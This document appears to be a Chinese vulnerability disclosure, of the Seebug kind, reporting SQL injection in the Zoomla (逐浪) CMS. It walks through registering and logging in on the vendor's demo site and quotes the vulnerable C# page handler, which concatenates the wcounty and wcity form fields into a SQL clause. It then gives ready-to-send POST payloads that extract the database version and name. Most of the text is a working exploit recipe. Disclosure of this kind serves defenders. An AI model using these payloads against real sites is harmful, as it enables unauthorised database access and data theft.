### 简要描述:
逐浪cms最新版sql注入
### 详细说明:
逐浪最新版 sql注入
可以注册普通用户
访问
```
http://demo.zoomla.cn/User/Register.aspx
```
随便注册一个用户
test1234 密码123456
访问
```
http://demo.zoomla.cn/User/Login.aspx?ReturnUrl=
```
登录
访问
```
http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx
```
源码如下
```
protected void Page_Load(object sender, EventArgs e)
{
if (!base.IsPostBack)
{
string str = base.Request.Form["sex"];
string str2 = base.Request.Form["age1"];
string str3 = base.Request.Form["age2"];
string str4 = base.Request.Form["wcounty"]; //没处理
string str5 = base.Request.Form["wcity"]; //没处理
string wherex = "";
if (!string.IsNullOrEmpty(str))
{
if (str == "女生")
{
wherex = wherex + " and UserSex=0";
}
else if (str == "男生")
{
wherex = wherex + " and UserSex=1";
}
}
if (!string.IsNullOrEmpty(str2))
{
string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString();
wherex = wherex + " and BirthDay<='" + str7 + "'";
}
if (!string.IsNullOrEmpty(str3))
{
string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString();
wherex = wherex + " and BirthDay>='" + str8 + "'";
}
if (!string.IsNullOrEmpty(str4))
{
wherex = wherex + " and workProvince='" + str4 + "'"; //存在注入
if (!string.IsNullOrEmpty(str5))
{
wherex = wherex + " and workCity='" + str5 + "'"; //存在注入
}
}
this.ViewState["wherex"] = wherex;
if (!this.buser.CheckLogin())
{
if (SiteConfig.UserConfig.EnableCheckCodeOfLogin)
{
this.PhValCode.Visible = true;
}
else
{
this.PhValCode.Visible = false;
}
this.dwindow.Style["display"] = "";
}
else
{
DataTable dt = new DataTable();
dt = UserTableBLL.GetUsersInfo(wherex);
this.Bind(dt);
}
}
}
```
访问
```
http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx
```
提交
```
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 --
```
[<img src="https://images.seebug.org/upload/201408/052032050cd5b7eaa837144bd5dca6aa1c7c04ad.png" alt="71.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/052032050cd5b7eaa837144bd5dca6aa1c7c04ad.png)
提交
```
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())>0 --
```
[<img src="https://images.seebug.org/upload/201408/052033050d663cbbe916ff39b7dd948e352115b8.png" alt="72.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/052033050d663cbbe916ff39b7dd948e352115b8.png)
### 漏洞证明:
漏洞证明如上
暂无评论